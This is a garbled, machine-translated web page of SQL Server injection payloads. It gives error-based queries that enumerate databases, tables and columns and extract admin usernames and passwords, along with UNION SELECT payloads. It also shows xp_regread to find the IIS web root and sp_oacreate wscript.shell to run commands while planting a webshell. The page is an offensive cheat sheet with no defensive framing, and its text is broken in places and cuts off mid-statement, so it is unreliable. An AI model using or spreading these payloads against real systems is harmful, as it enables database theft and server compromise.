Common SQL injection statement parsing (2) _ MySQL

Common SQL injection statement parsing (2) bitsCN.com

W "default Web site"

-V "e", "e :/"'--

Access attributes: (write a webshell together)

Declare @ o int exec sp_oacreate 'wscript. shell', @ o out exec sp_oamethod

@ O, 'run', NULL, 'cscript.exe c:/inetpub/wwwroot/chaccess. vbs-

W3svc/1/ROOT/e + browse'

Special tips for database explosion: % 5c = '/' or submit/and/modify % 5

How do I obtain the names of all tables in a database of SQLSERVER?

--------------------------------------------------------------------------------

User table:

Select name from sysobjects where xtype = 'u ';

System table:

Select name from sysobjects where xtype ='s ';

All tables:

Select name from sysobjects where xtype = 'S' or xtype = 'u ';

--------------------------------------------------------------------------------

And 0 <> (select top 1 paths from newtable )--

Obtain the database name (from 1 to 5 is the system id, more than 6 can be determined)

And 1 = (select name from master. dbo. sysdatabases where dbid = 7 )--

And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and

Dbid = 6)

Submit dbid =, 9... to get more database names.

And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'u') brute-force to a table

For example, admin

And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'u' and name

Not in ('admin') to obtain other tables.

And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = 'u' and

Name = 'admin'

And uid> (str (id) the value of the brute-force UID is assumed to be 18779569 uid = id

And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569)

Obtain an admin field, which is assumed to be user_id.

And 0 <> (select top 1 name from bbs. dbo. syscolumns where id = 18779569 and

Name not in

('Id',...) to expose other fields

And 0 <(select user_id from BBS. dbo. admin where username> 1) to get the user name

The password can be obtained in turn ..... Assume that fields such as user_id username and password exist.

And 0 <> (select count (*) from master. dbo. sysdatabases where name> 1 and

Dbid = 6)

And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'u ')

And 0 <> (select top 1 name from bbs. dbo. sysobjects where xtype = 'u' and name

Not in ('address '))

And 0 <> (select count (*) from bbs. dbo. sysobjects where xtype = 'u' and

Name = 'admin' and uid> (str (id) determine the id value

And 0 <> (select top 1 name from BBS. dbo. syscolumns where id = 773577794) all fields

? Id =-1 union select 1, 2, 4, 5, 6, 7, 8, 9, 10, 11, 12, 13, * from admin

? Id =-1 union select 1, 2, 4, 5, 6, 7, 8, *, 9, 10, 11, 12, 13 from admin

(Union and access are also useful)
Obtain the WEB path
; Create table [dbo]. [swap] ([swappass] [char] (255 ));--

And (select top 1 swappass from swap) = 1 --

; Create TABLE newtable (id int IDENTITY (1, 1), paths varchar (500) Declare

@ Test varchar (20) exec master .. xp_regread @ rootkey = 'hkey _ LOCAL_MACHINE ',

@ Key = 'System/CurrentControlSet/Services/W3SVC/Parameters/Virtual Roots /',

@ Value_name = '/', values = @ test OUTPUT insert into p

BitsCN.com